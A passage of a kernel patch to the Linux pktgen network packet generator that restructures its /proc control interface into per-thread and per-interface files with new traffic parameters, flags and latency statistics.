+ The kernel lock will be freed after the thread exited, so the code + is really not executed anymore as soon as the unload functions gets + the kernel lock back. + The init process may not have made the cleanup of the process here, + but the cleanup can be done safely with the module unloaded. + */ +}/* exit_pktgen_kthread */ + + /* proc/net/pg */ -static struct proc_dir_entry *pg_proc_ent = 0; -static struct proc_dir_entry *pg_busy_proc_ent = 0; +static char* pg_display_latency(struct pktgen_interface_info* info, char* p, int reset_latency) { + int i; + p += sprintf(p, " avg_latency: %dus min_lat: %dus max_lat: %dus pkts_in_sample: %llu\n", + info->avg_latency, info->min_latency, info->max_latency, + info->pkts_rcvd_since_clear); + p += sprintf(p, " Buckets(us) [ "); + for (i = 0; ilatency_bkts[i]); + } + p += sprintf(p, "]\n"); + + if (reset_latency) { + pg_reset_latency_counters(info); + } + return p; +} -static int proc_pg_busy_read(char *buf , char **start, off_t offset, - int len, int *eof, void *data) +static int proc_pg_if_read(char *buf , char **start, off_t offset, + int len, int *eof, void *data) { char *p; - + int i; + struct pktgen_interface_info* info = (struct pktgen_interface_info*)(data); + __u64 sa; + __u64 stopped; + __u64 now = getCurUs(); + __u64 now_rel_ns = getRelativeCurNs(); + p = buf; - p += sprintf(p, "%d\n", pg_busy); + p += sprintf(p, "VERSION-1\n"); /* Help with parsing compatibility */ + p += sprintf(p, "Params: count %llu min_pkt_size: %u max_pkt_size: %u\n frags: %d ipg: %u multiskb: %d ifname: %s\n", + info->count, info->min_pkt_size, info->max_pkt_size, + info->nfrags, info->ipg, info->multiskb, info->ifname); + p += sprintf(p, " dst_min: %s dst_max: %s\n src_min: %s src_max: %s\n", + info->dst_min, info->dst_max, info->src_min, info->src_max); + p += sprintf(p, " src_mac: "); + for (i = 0; i < 6; i++) { + p += sprintf(p, "%02X%s", info->src_mac[i], i == 5 ? 
" " : ":"); + } + p += sprintf(p, "dst_mac: "); + for (i = 0; i < 6; i++) { + p += sprintf(p, "%02X%s", info->dst_mac[i], i == 5 ? "\n" : ":"); + } + p += sprintf(p, " udp_src_min: %d udp_src_max: %d udp_dst_min: %d udp_dst_max: %d\n", + info->udp_src_min, info->udp_src_max, info->udp_dst_min, + info->udp_dst_max); + p += sprintf(p, " src_mac_count: %d dst_mac_count: %d peer_multiskb: %d\n Flags: ", + info->src_mac_count, info->dst_mac_count, info->peer_multiskb); + if (info->flags & F_IPSRC_RND) { + p += sprintf(p, "IPSRC_RND "); + } + if (info->flags & F_IPDST_RND) { + p += sprintf(p, "IPDST_RND "); + } + if (info->flags & F_TXSIZE_RND) { + p += sprintf(p, "TXSIZE_RND "); + } + if (info->flags & F_UDPSRC_RND) { + p += sprintf(p, "UDPSRC_RND "); + } + if (info->flags & F_UDPDST_RND) { + p += sprintf(p, "UDPDST_RND "); + } + if (info->flags & F_MACSRC_RND) { + p += sprintf(p, "MACSRC_RND "); + } + if (info->flags & F_MACDST_RND) { + p += sprintf(p, "MACDST_RND "); + } + p += sprintf(p, "\n"); + + sa = info->started_at; + stopped = info->stopped_at; + if (info->do_run_run) { + stopped = now; /* not really stopped, more like last-running-at */ + } + p += sprintf(p, "Current:\n pkts-sofar: %llu errors: %llu\n started: %lluus elapsed: %lluus\n idle: %lluns next_tx: %llu(%lli)ns\n", + info->sofar, info->errors, sa, (stopped - sa), info->idle_acc, + info->next_tx_ns, (long long)(info->next_tx_ns) - (long long)(now_rel_ns)); + p += sprintf(p, " seq_num: %d cur_dst_mac_offset: %d cur_src_mac_offset: %d\n", + info->seq_num, info->cur_dst_mac_offset, info->cur_src_mac_offset); + p += sprintf(p, " cur_saddr: 0x%x cur_daddr: 0x%x cur_udp_dst: %d cur_udp_src: %d\n", + info->cur_saddr, info->cur_daddr, info->cur_udp_dst, info->cur_udp_src); + p += sprintf(p, " pkts_rcvd: %llu bytes_rcvd: %llu last_seq_rcvd: %d ooo_rcvd: %llu\n", + info->pkts_rcvd, info->bytes_rcvd, info->last_seq_rcvd, info->ooo_rcvd); + p += sprintf(p, " dup_rcvd: %llu seq_gap_rcvd(dropped): %llu non_pg_rcvd: 
%llu\n", + info->dup_rcvd, info->seq_gap_rcvd, info->non_pg_pkts_rcvd); + + p = pg_display_latency(info, p, 0); + + if (info->result[0]) + p += sprintf(p, "Result: %s\n", info->result); + else + p += sprintf(p, "Result: Idle\n"); *eof = 1; - - return p-buf; + + return p - buf; } -static int proc_pg_read(char *buf , char **start, off_t offset, - int len, int *eof, void *data) + +static int proc_pg_thread_read(char *buf , char **start, off_t offset, + int len, int *eof, void *data) { char *p; - int i; - + struct pktgen_thread_info* pg_thread = (struct pktgen_thread_info*)(data); + struct pktgen_interface_info* info = NULL; + + if (!pg_thread) { + printk("ERROR: could not find pg_thread in proc_pg_thread_read\n"); + return -EINVAL; + } + p = buf; - p += sprintf(p, "Params: count=%u pkt_size=%u frags %d ipg %u multiskb %d odev \"%s\" dst %s dstmac ", - pg_count, pkt_size, nfrags, pg_ipg, pg_multiskb, - pg_outdev, pg_dst); - for (i = 0; i < 6; i++) - p += sprintf(p, "%02X%s", pg_dstmac[i], i == 5 ? 
"\n" : ":"); + p += sprintf(p, "VERSION-1\n"); /* Help with parsing compatibility */ + p += sprintf(p, "Name: %s max_before_softirq: %d\n", + pg_thread->name, pg_thread->max_before_softirq); + + pg_lock(pg_thread, __FUNCTION__); + if (pg_thread->cur_if) { + p += sprintf(p, "Current: %s\n", pg_thread->cur_if->ifname); + } + else { + p += sprintf(p, "Current: NULL\n"); + } + pg_unlock(pg_thread, __FUNCTION__); + + p += sprintf(p, "Running: "); + + pg_lock(pg_thread, __FUNCTION__); + info = pg_thread->running_if_infos; + while (info) { + p += sprintf(p, "%s ", info->ifname); + info = info->next; + } + p += sprintf(p, "\nStopped: "); + info = pg_thread->stopped_if_infos; + while (info) { + p += sprintf(p, "%s ", info->ifname); + info = info->next; + } - if (pg_result[0]) - p += sprintf(p, "Result: %s\n", pg_result); + if (pg_thread->result[0]) + p += sprintf(p, "\nResult: %s\n", pg_thread->result); else - p += sprintf(p, "Result: Idle\n"); + p += sprintf(p, "\nResult: NA\n"); *eof = 1; + pg_unlock(pg_thread, __FUNCTION__); + return p - buf; -} +}/* proc_pg_thread_read */ -static int count_trail_chars(const char *buffer, unsigned int maxlen) + +static int proc_pg_ctrl_read(char *buf , char **start, off_t offset, + int len, int *eof, void *data) +{ + char *p; + struct pktgen_thread_info* pg_thread = NULL; + + p = buf; + p += sprintf(p, "VERSION-1\n"); /* Help with parsing compatibility */ + p += sprintf(p, "Threads: "); + + pg_lock_thread_list(__FUNCTION__); + pg_thread = pktgen_threads; + while (pg_thread) { + p += sprintf(p, "%s ", pg_thread->name); + pg_thread = pg_thread->next; + } + p += sprintf(p, "\n"); + + *eof = 1; + + pg_unlock_thread_list(__FUNCTION__); + return p - buf; +}/* proc_pg_ctrl_read */ + + +static int count_trail_chars(const char *user_buffer, unsigned int maxlen) { int i; for (i = 0; i < maxlen; i++) { - switch (buffer[i]) { + char c; + if (get_user(c, &user_buffer[i])) + return -EFAULT; + switch (c) { case '\"': case '\n': case '\r': @@ -490,7 
+1980,7 @@ return i; } -static unsigned long num_arg(const char *buffer, unsigned long maxlen, +static unsigned long num_arg(const char *user_buffer, unsigned long maxlen, unsigned long *num) { int i = 0; @@ -498,21 +1988,27 @@ *num = 0; for(; i < maxlen; i++) { - if ((buffer[i] >= '0') && (buffer[i] <= '9')) { + char c; + if (get_user(c, &user_buffer[i])) + return -EFAULT; + if ((c >= '0') && (c <= '9')) { *num *= 10; - *num += buffer[i] -'0'; + *num += c -'0'; } else break; } return i; } -static int strn_len(const char *buffer, unsigned int maxlen) +static int strn_len(const char *user_buffer, unsigned int maxlen) { int i = 0; for(; i < maxlen; i++) { - switch (buffer[i]) { + char c; + if (get_user(c, &user_buffer[i])) + return -EFAULT; + switch (c) { case '\"': case '\n': case '\r': @@ -526,117 +2022,391 @@ return i; } -static int proc_pg_write(struct file *file, const char *buffer, - unsigned long count, void *data) +static int proc_pg_if_write(struct file *file, const char *user_buffer, + unsigned long count, void *data) { int i = 0, max, len; char name[16], valstr[32]; unsigned long value = 0; - + struct pktgen_interface_info* info = (struct pktgen_interface_info*)(data); + char* pg_result = NULL; + int tmp = 0; + + pg_result = &(info->result[0]); + if (count < 1) { sprintf(pg_result, "Wrong command format"); return -EINVAL; } max = count - i; - i += count_trail_chars(&buffer[i], max); - + tmp = count_trail_chars(&user_buffer[i], max); + if (tmp < 0) { return tmp; } + i += tmp; + /* Read variable name */ - len = strn_len(&buffer[i], sizeof(name) - 1); + len = strn_len(&user_buffer[i], sizeof(name) - 1); + if (len < 0) { return len; } memset(name, 0, sizeof(name)); - strncpy(name, &buffer[i], len); + copy_from_user(name, &user_buffer[i], len); i += len; max = count -i; - len = count_trail_chars(&buffer[i], max); + len = count_trail_chars(&user_buffer[i], max); + if (len < 0) { + return len; + } i += len; - if (debug) - printk("pg: %s,%lu\n", name, count); + if 
(debug) { + char tb[count + 1]; + copy_from_user(tb, user_buffer, count); + tb[count] = 0; + printk("pg: %s,%lu buffer -:%s:-\n", name, count, tb); + } - /* Only stop is allowed when we are running */ - if (!strcmp(name, "stop")) { - forced_stop = 1; - if (pg_busy) + if (info->do_run_run) { strcpy(pg_result, "Stopping"); + pg_stop_interface(info->pg_thread, info); + } + else { + strcpy(pg_result, "Already stopped...\n"); + } return count; } - if (pg_busy) { - strcpy(pg_result, "Busy"); - return -EINVAL; + if (!strcmp(name, "min_pkt_size")) { + len = num_arg(&user_buffer[i], 10, &value); + if (len < 0) { return len; } + i += len; + if (value < 14+20+8) + value = 14+20+8; + if (value != info->min_pkt_size) { + info->min_pkt_size = value; + info->cur_pkt_size = value; + } + sprintf(pg_result, "OK: min_pkt_size=%u", info->min_pkt_size); + return count; } - if (!strcmp(name, "pkt_size")) { - len = num_arg(&buffer[i], 10, &value); + if (!strcmp(name, "debug")) { + len = num_arg(&user_buffer[i], 10, &value); + if (len < 0) { return len; } + i += len; + debug = value; + sprintf(pg_result, "OK: debug=%u", debug); + return count; + } + + if (!strcmp(name, "max_pkt_size")) { + len = num_arg(&user_buffer[i], 10, &value); + if (len < 0) { return len; } i += len; if (value < 14+20+8) value = 14+20+8; - pkt_size = value; - sprintf(pg_result, "OK: pkt_size=%u", pkt_size); + if (value != info->max_pkt_size) { + info->max_pkt_size = value; + info->cur_pkt_size = value; + } + sprintf(pg_result, "OK: max_pkt_size=%u", info->max_pkt_size); return count; } - if (!strcmp(name, "frags")) { - len = num_arg(&buffer[i], 10, &value); + + if (!strcmp(name, "frags")) { + len = num_arg(&user_buffer[i], 10, &value); + if (len < 0) { return len; } i += len; - nfrags = value; - sprintf(pg_result, "OK: frags=%u", nfrags); + info->nfrags = value; + sprintf(pg_result, "OK: frags=%u", info->nfrags); return count; } if (!strcmp(name, "ipg")) { - len = num_arg(&buffer[i], 10, &value); + len = 
num_arg(&user_buffer[i], 10, &value); + if (len < 0) { return len; } + i += len; + info->ipg = value; + if ((getRelativeCurNs() + info->ipg) > info->next_tx_ns) { + info->next_tx_ns = getRelativeCurNs() + info->ipg; + } + sprintf(pg_result, "OK: ipg=%u", info->ipg); + return count; + } + if (!strcmp(name, "udp_src_min")) { + len = num_arg(&user_buffer[i], 10, &value); + if (len < 0) { return len; } i += len; - pg_ipg = value; - sprintf(pg_result, "OK: ipg=%u", pg_ipg); + if (value != info->udp_src_min) { + info->udp_src_min = value; + info->cur_udp_src = value; + } + sprintf(pg_result, "OK: udp_src_min=%u", info->udp_src_min); + return count; + } + if (!strcmp(name, "udp_dst_min")) { + len = num_arg(&user_buffer[i], 10, &value); + if (len < 0) { return len; } + i += len; + if (value != info->udp_dst_min) { + info->udp_dst_min = value; + info->cur_udp_dst = value; + } + sprintf(pg_result, "OK: udp_dst_min=%u", info->udp_dst_min); + return count; + } + if (!strcmp(name, "udp_src_max")) { + len = num_arg(&user_buffer[i], 10, &value); + if (len < 0) { return len; } + i += len; + if (value != info->udp_src_max) { + info->udp_src_max = value; + info->cur_udp_src = value; + } + sprintf(pg_result, "OK: udp_src_max=%u", info->udp_src_max); + return count; + } + if (!strcmp(name, "udp_dst_max")) { + len = num_arg(&user_buffer[i], 10, &value); + if (len < 0) { return len; } + i += len; + if (value != info->udp_dst_max) { + info->udp_dst_max = value; + info->cur_udp_dst = value; + } + sprintf(pg_result, "OK: udp_dst_max=%u", info->udp_dst_max); return count; } if (!strcmp(name, "multiskb")) { - len = num_arg(&buffer[i], 10, &value); + len = num_arg(&user_buffer[i], 10, &value); + if (len < 0) { return len; } i += len; - pg_multiskb = (value ? 
1 : 0); - sprintf(pg_result, "OK: multiskb=%d", pg_multiskb); + info->multiskb = value; + + sprintf(pg_result, "OK: multiskb=%d", info->multiskb); + return count; + } + if (!strcmp(name, "peer_multiskb")) { + len = num_arg(&user_buffer[i], 10, &value); + if (len < 0) { return len; } + i += len; + info->peer_multiskb = value; + + sprintf(pg_result, "OK: peer_multiskb=%d", info->peer_multiskb); return count; } if (!strcmp(name, "count")) { - len = num_arg(&buffer[i], 10, &value); + len = num_arg(&user_buffer[i], 10, &value); + if (len < 0) { return len; } i += len; - if (value != 0) { - pg_count = value; - sprintf(pg_result, "OK: count=%u", pg_count); - } else - sprintf(pg_result, "ERROR: no point in sending 0 packets. Leaving count=%u", pg_count); + info->count = value; + sprintf(pg_result, "OK: count=%llu", info->count); return count; } - if (!strcmp(name, "odev")) { - len = strn_len(&buffer[i], sizeof(pg_outdev) - 1); - memset(pg_outdev, 0, sizeof(pg_outdev)); - strncpy(pg_outdev, &buffer[i], len); + if (!strcmp(name, "src_mac_count")) { + len = num_arg(&user_buffer[i], 10, &value); + if (len < 0) { return len; } i += len; - sprintf(pg_result, "OK: odev=%s", pg_outdev); + if (info->src_mac_count != value) { + info->src_mac_count = value; + info->cur_src_mac_offset = 0; + } + sprintf(pg_result, "OK: src_mac_count=%d", info->src_mac_count); return count; } - if (!strcmp(name, "dst")) { - len = strn_len(&buffer[i], sizeof(pg_dst) - 1); - memset(pg_dst, 0, sizeof(pg_dst)); - strncpy(pg_dst, &buffer[i], len); + if (!strcmp(name, "dst_mac_count")) { + len = num_arg(&user_buffer[i], 10, &value); + if (len < 0) { return len; } + i += len; + if (info->dst_mac_count != value) { + info->dst_mac_count = value; + info->cur_dst_mac_offset = 0; + } + sprintf(pg_result, "OK: dst_mac_count=%d", info->dst_mac_count); + return count; + } + if (!strcmp(name, "flag")) { + char f[32]; + memset(f, 0, 32); + len = strn_len(&user_buffer[i], sizeof(f) - 1); + if (len < 0) { return len; } + 
copy_from_user(f, &user_buffer[i], len); + i += len; + if (strcmp(f, "IPSRC_RND") == 0) { + info->flags |= F_IPSRC_RND; + } + else if (strcmp(f, "!IPSRC_RND") == 0) { + info->flags &= ~F_IPSRC_RND; + } + else if (strcmp(f, "TXSIZE_RND") == 0) { + info->flags |= F_TXSIZE_RND; + } + else if (strcmp(f, "!TXSIZE_RND") == 0) { + info->flags &= ~F_TXSIZE_RND; + } + else if (strcmp(f, "IPDST_RND") == 0) { + info->flags |= F_IPDST_RND; + } + else if (strcmp(f, "!IPDST_RND") == 0) { + info->flags &= ~F_IPDST_RND; + } + else if (strcmp(f, "UDPSRC_RND") == 0) { + info->flags |= F_UDPSRC_RND; + } + else if (strcmp(f, "!UDPSRC_RND") == 0) { + info->flags &= ~F_UDPSRC_RND; + } + else if (strcmp(f, "UDPDST_RND") == 0) { + info->flags |= F_UDPDST_RND; + } + else if (strcmp(f, "!UDPDST_RND") == 0) { + info->flags &= ~F_UDPDST_RND; + } + else if (strcmp(f, "MACSRC_RND") == 0) { + info->flags |= F_MACSRC_RND; + } + else if (strcmp(f, "!MACSRC_RND") == 0) { + info->flags &= ~F_MACSRC_RND; + } + else if (strcmp(f, "MACDST_RND") == 0) { + info->flags |= F_MACDST_RND; + } + else if (strcmp(f, "!MACDST_RND") == 0) { + info->flags &= ~F_MACDST_RND; + } + else { + sprintf(pg_result, "Flag -:%s:- unknown\nAvailable flags, (prepend ! 
to un-set flag):\n%s", + f, + "IPSRC_RND, IPDST_RND, TXSIZE_RND, UDPSRC_RND, UDPDST_RND, MACSRC_RND, MACDST_RND\n"); + return count; + } + sprintf(pg_result, "OK: flags=0x%x", info->flags); + return count; + } + if (!strcmp(name, "dst_min") || !strcmp(name, "dst")) { + char buf[IP_NAME_SZ]; + len = strn_len(&user_buffer[i], sizeof(info->dst_min) - 1); + if (len < 0) { return len; } + copy_from_user(buf, &user_buffer[i], len); + buf[len] = 0; + if (strcmp(buf, info->dst_min) != 0) { + memset(info->dst_min, 0, sizeof(info->dst_min)); + strncpy(info->dst_min, buf, len); + info->daddr_min = in_aton(info->dst_min); + info->cur_daddr = info->daddr_min; + } + if(debug) + printk("pg: dst_min set to: %s\n", info->dst_min); + i += len; + sprintf(pg_result, "OK: dst_min=%s", info->dst_min); + return count; + } + if (!strcmp(name, "dst_max")) { + char buf[IP_NAME_SZ]; + len = strn_len(&user_buffer[i], sizeof(info->dst_max) - 1); + if (len < 0) { return len; } + copy_from_user(buf, &user_buffer[i], len); + buf[len] = 0; + if (strcmp(buf, info->dst_max) != 0) { + memset(info->dst_max, 0, sizeof(info->dst_max)); + strncpy(info->dst_max, buf, len); + info->daddr_max = in_aton(info->dst_max); + info->cur_daddr = info->daddr_max; + } + if(debug) + printk("pg: dst_max set to: %s\n", info->dst_max); + i += len; + sprintf(pg_result, "OK: dst_max=%s", info->dst_max); + return count; + } + if (!strcmp(name, "src_min")) { + char buf[IP_NAME_SZ]; + len = strn_len(&user_buffer[i], sizeof(info->src_min) - 1); + if (len < 0) { return len; } + copy_from_user(buf, &user_buffer[i], len); + buf[len] = 0; + if (strcmp(buf, info->src_min) != 0) { + memset(info->src_min, 0, sizeof(info->src_min)); + strncpy(info->src_min, buf, len); + info->saddr_min = in_aton(info->src_min); + info->cur_saddr = info->saddr_min; + } + if(debug) + printk("pg: src_min set to: %s\n", info->src_min); + i += len; + sprintf(pg_result, "OK: src_min=%s", info->src_min); + return count; + } + if (!strcmp(name, "src_max")) { 
+ char buf[IP_NAME_SZ]; + len = strn_len(&user_buffer[i], sizeof(info->src_max) - 1); + if (len < 0) { return len; } + copy_from_user(buf, &user_buffer[i], len); + buf[len] = 0; + if (strcmp(buf, info->src_max) != 0) { + memset(info->src_max, 0, sizeof(info->src_max)); + strncpy(info->src_max, buf, len); + info->saddr_max = in_aton(info->src_max); + info->cur_saddr = info->saddr_max; + } if(debug) - printk("pg: dst set to: %s\n", pg_dst); + printk("pg: src_max set to: %s\n", info->src_max); i += len; - sprintf(pg_result, "OK: dst=%s", pg_dst); + sprintf(pg_result, "OK: src_max=%s", info->src_max); + return count; + } + if (!strcmp(name, "dst_mac")) { + char *v = valstr; + unsigned char old_dmac[6]; + unsigned char *m = info->dst_mac; + memcpy(old_dmac, info->dst_mac, 6); + + len = strn_len(&user_buffer[i], sizeof(valstr) - 1); + if (len < 0) { return len; } + memset(valstr, 0, sizeof(valstr)); + copy_from_user(valstr, &user_buffer[i], len); + i += len; + + for(*m = 0;*v && m < info->dst_mac + 6; v++) { + if (*v >= '0' && *v <= '9') { + *m *= 16; + *m += *v - '0'; + } + if (*v >= 'A' && *v <= 'F') { + *m *= 16; + *m += *v - 'A' + 10; + } + if (*v >= 'a' && *v <= 'f') { + *m *= 16; + *m += *v - 'a' + 10; + } + if (*v == ':') { + m++; + *m = 0; + } + } + + if (memcmp(old_dmac, info->dst_mac, 6) != 0) { + /* Set up Dest MAC */ + memcpy(&(info->hh[0]), info->dst_mac, 6); + } + + sprintf(pg_result, "OK: dstmac"); return count; } - if (!strcmp(name, "dstmac")) { + if (!strcmp(name, "src_mac")) { char *v = valstr; - unsigned char *m = pg_dstmac; + unsigned char old_smac[6]; + unsigned char *m = info->src_mac; - len = strn_len(&buffer[i], sizeof(valstr) - 1); + memcpy(old_smac, info->src_mac, 6); + len = strn_len(&user_buffer[i], sizeof(valstr) - 1); + if (len < 0) { return len; } memset(valstr, 0, sizeof(valstr)); - strncpy(valstr, &buffer[i], len); + copy_from_user(valstr, &user_buffer[i], len); i += len; - for(*m = 0;*v && m < pg_dstmac + 6; v++) { + for(*m = 0;*v && m < 
info->src_mac + 6; v++) { if (*v >= '0' && *v <= '9') { *m *= 16; *m += *v - '0'; @@ -654,66 +2424,536 @@ *m = 0; } } - sprintf(pg_result, "OK: dstmac"); + + if (memcmp(old_smac, info->src_mac, 6) != 0) { + /* Default to the interface's mac if not explicitly set. */ + if ((!(info->flags & F_SET_SRCMAC)) && info->odev) { + memcpy(&(info->hh[6]), info->odev->dev_addr, 6); + } + else { + memcpy(&(info->hh[6]), info->src_mac, 6); + } + } + + sprintf(pg_result, "OK: srcmac"); return count; } + if (!strcmp(name, "clear_counters")) { + pg_clear_counters(info); + sprintf(pg_result, "OK: Clearing counters...\n"); + return count; + } + if (!strcmp(name, "inject") || !strcmp(name, "start")) { - MOD_INC_USE_COUNT; - pg_busy = 1; - strcpy(pg_result, "Starting"); - pg_inject(); - pg_busy = 0; - MOD_DEC_USE_COUNT; + if (info->do_run_run) { + strcpy(info->result, "Already running...\n"); + } + else { + int rv; + if ((rv = pg_start_interface(info->pg_thread, info)) >= 0) { + strcpy(info->result, "Starting"); + } + else { + sprintf(info->result, "Error starting: %i\n", rv); + } + } return count; } - sprintf(pg_result, "No such parameter \"%s\"", name); + sprintf(info->result, "No such parameter \"%s\"", name); + return -EINVAL; +}/* proc_pg_if_write */ + + +static int proc_pg_ctrl_write(struct file *file, const char *user_buffer, + unsigned long count, void *data) +{ + int i = 0, max, len; + char name[16]; + struct pktgen_thread_info* pg_thread = NULL; + + if (count < 1) { + printk("Wrong command format"); + return -EINVAL; + } + + max = count - i; + len = count_trail_chars(&user_buffer[i], max); + if (len < 0) { return len; } + i += len; + + /* Read variable name */ + + len = strn_len(&user_buffer[i], sizeof(name) - 1); + if (len < 0) { return len; } + memset(name, 0, sizeof(name)); + copy_from_user(name, &user_buffer[i], len); + i += len; + + max = count -i; + len = count_trail_chars(&user_buffer[i], max); + if (len < 0) { return len; } + i += len; + + if (debug) + 
printk("pg_thread: %s,%lu\n", name, count); + + if (!strcmp(name, "stop")) { + char f[32]; + memset(f, 0, 32); + len = strn_len(&user_buffer[i], sizeof(f) - 1); + if (len < 0) { return len; } + copy_from_user(f, &user_buffer[i], len); + i += len; + pg_thread = pg_find_thread(f); + if (pg_thread) { + printk("pktgen INFO: stopping thread: %s\n", pg_thread->name); + stop_pktgen_kthread(pg_thread); + } + return count; + } + + if (!strcmp(name, "start")) { + char f[32]; + memset(f, 0, 32); + len = strn_len(&user_buffer[i], sizeof(f) - 1); + if (len < 0) { return len; } + copy_from_user(f, &user_buffer[i], len); + i += len; + pg_add_thread_info(f); + return count; + } + + return -EINVAL; +}/* proc_pg_ctrl_write */ + + +static int proc_pg_thread_write(struct file *file, const char *user_buffer, + unsigned long count, void *data) +{ + int i = 0, max, len; + char name[16]; + struct pktgen_thread_info* pg_thread = (struct pktgen_thread_info*)(data); + char* pg_result = &(pg_thread->result[0]); + unsigned long value = 0; + + if (count < 1) { + sprintf(pg_result, "Wrong command format"); + return -EINVAL; + } + + max = count - i; + len = count_trail_chars(&user_buffer[i], max); + if (len < 0) { return len; } + i += len; + + /* Read variable name */ + + len = strn_len(&user_buffer[i], sizeof(name) - 1); + if (len < 0) { return len; } + memset(name, 0, sizeof(name)); + copy_from_user(name, &user_buffer[i], len); + i += len; + + max = count -i; + len = count_trail_chars(&user_buffer[i], max); + if (len < 0) { return len; } + i += len; + + if (debug) { + printk("pg_thread: %s,%lu\n", name, count); + } + + if (!strcmp(name, "add_interface")) { + char f[32]; + memset(f, 0, 32); + len = strn_len(&user_buffer[i], sizeof(f) - 1); + if (len < 0) { return len; } + copy_from_user(f, &user_buffer[i], len); + i += len; + pg_add_interface_info(pg_thread, f); + return count; + } + + if (!strcmp(name, "rem_interface")) { + struct pktgen_interface_info* info = NULL; + char f[32]; + memset(f, 0, 
32); + len = strn_len(&user_buffer[i], sizeof(f) - 1); + if (len < 0) { return len; } + copy_from_user(f, &user_buffer[i], len); + i += len; + info = pg_find_interface(pg_thread, f); + if (info) { + pg_rem_interface_info(pg_thread, info); + return count; + } + else { + printk("ERROR: That interface is not found.\n"); + return -ENODEV; + } + } + + if (!strcmp(name, "max_before_softirq")) { + len = num_arg(&user_buffer[i], 10, &value); + pg_thread->max_before_softirq = value; + return count; + } + + return -EINVAL; +}/* proc_pg_thread_write */ + + +int create_proc_dir(void) +{ + int len; + /* does proc_dir already exist? */ + len = strlen(PG_PROC_DIR); + + for (pg_proc_dir = proc_net->subdir; pg_proc_dir; pg_proc_dir=pg_proc_dir->next) { + if ((pg_proc_dir->namelen == len) && + (! memcmp(pg_proc_dir->name, PG_PROC_DIR, len))) { + break; + } + } + + if (!pg_proc_dir) { + pg_proc_dir = create_proc_entry(PG_PROC_DIR, S_IFDIR, proc_net); + } + + if (!pg_proc_dir) { + return -ENODEV; + } + + return 0; } -static int __init pg_init(void) +int remove_proc_dir(void) { + remove_proc_entry(PG_PROC_DIR, proc_net); + return 0; +} + +static struct pktgen_interface_info* pg_find_interface(struct pktgen_thread_info* pg_thread, + const char* ifname) { + struct pktgen_interface_info* rv = NULL; + pg_lock(pg_thread, __FUNCTION__); + + if (pg_thread->cur_if && (strcmp(pg_thread->cur_if->ifname, ifname) == 0)) { + rv = pg_thread->cur_if; + goto found; + } + + rv = pg_thread->running_if_infos; + while (rv) { + if (strcmp(rv->ifname, ifname) == 0) { + goto found; + } + rv = rv->next; + } + + rv = pg_thread->stopped_if_infos; + while (rv) { + if (strcmp(rv->ifname, ifname) == 0) { + goto found; + } + rv = rv->next; + } + found: + pg_unlock(pg_thread, __FUNCTION__); + return rv; +}/* pg_find_interface */ + + +static int pg_add_interface_info(struct pktgen_thread_info* pg_thread, const char* ifname) { + struct pktgen_interface_info* i = pg_find_interface(pg_thread, ifname); + if (!i) { + i = 
kmalloc(sizeof(struct pktgen_interface_info), GFP_KERNEL); + if (!i) { + return -ENOMEM; + } + memset(i, 0, sizeof(struct pktgen_interface_info)); + + i->min_pkt_size = ETH_ZLEN; + i->max_pkt_size = ETH_ZLEN; + i->nfrags = 0; + i->multiskb = pg_multiskb_d; + i->peer_multiskb = 0; + i->ipg = pg_ipg_d; + i->count = pg_count_d; + i->sofar = 0; + i->hh[12] = 0x08; /* fill in protocol. Rest is filled in later. */ + i->hh[13] = 0x00; + i->udp_src_min = 9; /* sink NULL */ + i->udp_src_max = 9; + i->udp_dst_min = 9; + i->udp_dst_max = 9; + i->rcv = pktgen_receive; + + strncpy(i->ifname, ifname, 31); + sprintf(i->fname, "net/%s/%s", PG_PROC_DIR, ifname); + + if (! pg_setup_interface(i)) { + printk("ERROR: pg_setup_interface failed.\n"); + kfree(i); + return -ENODEV; + } + + i->proc_ent = create_proc_entry(i->fname, 0600, 0); + if (!i->proc_ent) { + printk("pktgen: Error: cannot create %s procfs entry.\n", i->fname); + kfree(i); + return -EINVAL; + } + i->proc_ent->read_proc = proc_pg_if_read; + i->proc_ent->write_proc = proc_pg_if_write; + i->proc_ent->data = (void*)(i); + + return add_interface_to_thread(pg_thread, i); + } + else { + printk("ERROR: interface already exists.\n"); + return -EBUSY; + } +}/* pg_add_interface_info */ + + +/* return the first !in_use thread structure */ +static struct pktgen_thread_info* pg_gc_thread_list_helper(void) { + struct pktgen_thread_info* rv = NULL; + + pg_lock_thread_list(__FUNCTION__); + + rv = pktgen_threads; + while (rv) { + if (!rv->in_use) { + break; + } + rv = rv->next; + } + pg_unlock_thread_list(__FUNCTION__); + return rv; +}/* pg_gc_thread_list_helper */ + +static void pg_gc_thread_list(void) { + struct pktgen_thread_info* t = NULL; + struct pktgen_thread_info* w = NULL; + + while ((t = pg_gc_thread_list_helper())) { + pg_lock_thread_list(__FUNCTION__); + if (pktgen_threads == t) { + pktgen_threads = t->next; + kfree(t); + } + else { + w = pktgen_threads; + while (w) { + if (w->next == t) { + w->next = t->next; + t->next = NULL; + 
kfree(t); + break; + } + w = w->next; + } + } + pg_unlock_thread_list(__FUNCTION__); + } +}/* pg_gc_thread_list */ + + +static struct pktgen_thread_info* pg_find_thread(const char* name) { + struct pktgen_thread_info* rv = NULL; + + pg_gc_thread_list(); + + pg_lock_thread_list(__FUNCTION__); + + rv = pktgen_threads; + while (rv) { + if (strcmp(rv->name, name) == 0) { + break; + } + rv = rv->next; + } + pg_unlock_thread_list(__FUNCTION__); + return rv; +}/* pg_find_thread */ + + +static int pg_add_thread_info(const char* name) { + struct pktgen_thread_info* pg_thread = NULL; + + if (strlen(name) > 31) { + printk("pktgen ERROR: Thread name cannot be more than 31 characters.\n"); + return -EINVAL; + } + + if (pg_find_thread(name)) { + printk("pktgen ERROR: Thread: %s already exists\n", name); + return -EINVAL; + } + + pg_thread = (struct pktgen_thread_info*)(kmalloc(sizeof(struct pktgen_thread_info), GFP_KERNEL)); + if (!pg_thread) { + printk("pktgen: ERROR: out of memory, can't create new thread.\n"); + return -ENOMEM; + } + + memset(pg_thread, 0, sizeof(struct pktgen_thread_info)); + strcpy(pg_thread->name, name); + spin_lock_init(&(pg_thread->pg_threadlock)); + pg_thread->in_use = 1; + pg_thread->max_before_softirq = 100; + + sprintf(pg_thread->fname, "net/%s/%s", PG_PROC_DIR, pg_thread->name); + pg_thread->proc_ent = create_proc_entry(pg_thread->fname, 0600, 0); + if (!pg_thread->proc_ent) { + printk("pktgen: Error: cannot create %s procfs entry.\n", pg_thread->fname); + kfree(pg_thread); + return -EINVAL; + } + pg_thread->proc_ent->read_proc = proc_pg_thread_read; + pg_thread->proc_ent->write_proc = proc_pg_thread_write; + pg_thread->proc_ent->data = (void*)(pg_thread); + + pg_thread->next = pktgen_threads; + 